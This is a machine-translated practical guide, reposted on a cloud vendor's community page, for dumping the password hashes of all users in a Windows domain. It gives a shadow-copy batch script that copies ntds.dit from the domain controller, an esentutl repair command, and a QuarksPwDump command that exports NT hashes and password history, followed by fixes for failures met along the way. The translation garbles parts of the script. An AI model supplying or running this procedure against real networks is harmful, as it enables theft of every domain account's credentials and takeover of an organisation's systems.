Home > Others

Use shadowcopy+quarkspwdump0.3a to export hashes for all users in the current domain

Source: Internet
Author: User
Tags goto
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

This article is a number of pit records that are solved in practice, and the process comes from the http://drops.wooyun.org/tips/6617 0x06 final scheme

First look at the original record
1. Using the shadowcopy command line version, write the bat implementation copy Ntds.dit to the current directory.

Shadowcopy.vbs

Setlocal
if not "%callback_script%" = = "" Goto:is_callback
set source_drive_letter=%systemdrive%
set Source_relative_path=\windows\ntds\ntds.dit
set destination_path=%~dp0
@echo ... Determine the scripts to be executed/generated ...
Set callback_script=%~dpnx0
set Temp_generated_script=generatedvarstempscript.cmd
@echo ... Creating the shadow copy ...
" %~dp0vshadow.exe "-script=%temp_generated_script%-exec="%callback_script% "%source_drive_letter%
del/f%TEMP_ generated_script%
@goto: EOF
: Is_callback
setlocal
@echo ... Obtaining the shadow copy device name
... Call%temp_generated_script%
@echo ... Copying from the shadow copy to the destination path
... Copy "%shadow_device_1%\%source_relative_path%"%destination_path%

Reference Link: http://blogs.msdn.com/b/adioltean/archive/2005/01/05/346793.aspx

2. Repair the replicated database

esentutl/p/o Ntds.dit

3. Use Quarkspwdump to read the information directly and export the results to a file

Quarkspwdump.exe-dhb-hist-nt Ntds.dit-o Log.txt

Tips:

QuarksPwDump.exe:Dump various types of Windows credentials without injecting in any process.
SOURCE download link, vs2010 Direct compilation can
Https://github.com/quarkslab/quarkspwdump

Pit A:

The original shadowcopy code in%~dp0vsshadow.exe "will be prompted to find Vsshadow.exe, here write a S.

Pit B:

COM call "M_pvssobject->initializeforbackup ()" failed.
The domain control is 64-bit, and you are running a 32-bit vshadow.exe.
Workaround: Install the Win7 SDK, use the 64-bit Vshadow.exe (available in win2008, win2012) (default location) "C:\Program Files\Microsoft Sdks\windows\v6.1\bin\x64 \vsstools\vshadow.exe ".

Pit C:

SOURCE download link, vs2010 Direct compilation can
Https://github.com/quarkslab/quarkspwdump
The master is shown on the home page, but it is still in version 0.2.
The real release address is (not compiled) quarkspwdump-0.3a
The author compiled version in the execution of the time will display 0.2b, here should be the author did not deal with it, but does not affect our use, as long as the observation whether there are-SF parameters, you can determine whether the new version.

This version resolves the Not enough memory issue

Parsing DataTable ... Fatal Error:not enough memory!

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
how to check all users in linux how to list all users in linux show grants for all users powershell export users group membership to csv export ad users to csv powershell ldap query all users in ou mysql show grants for all users

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More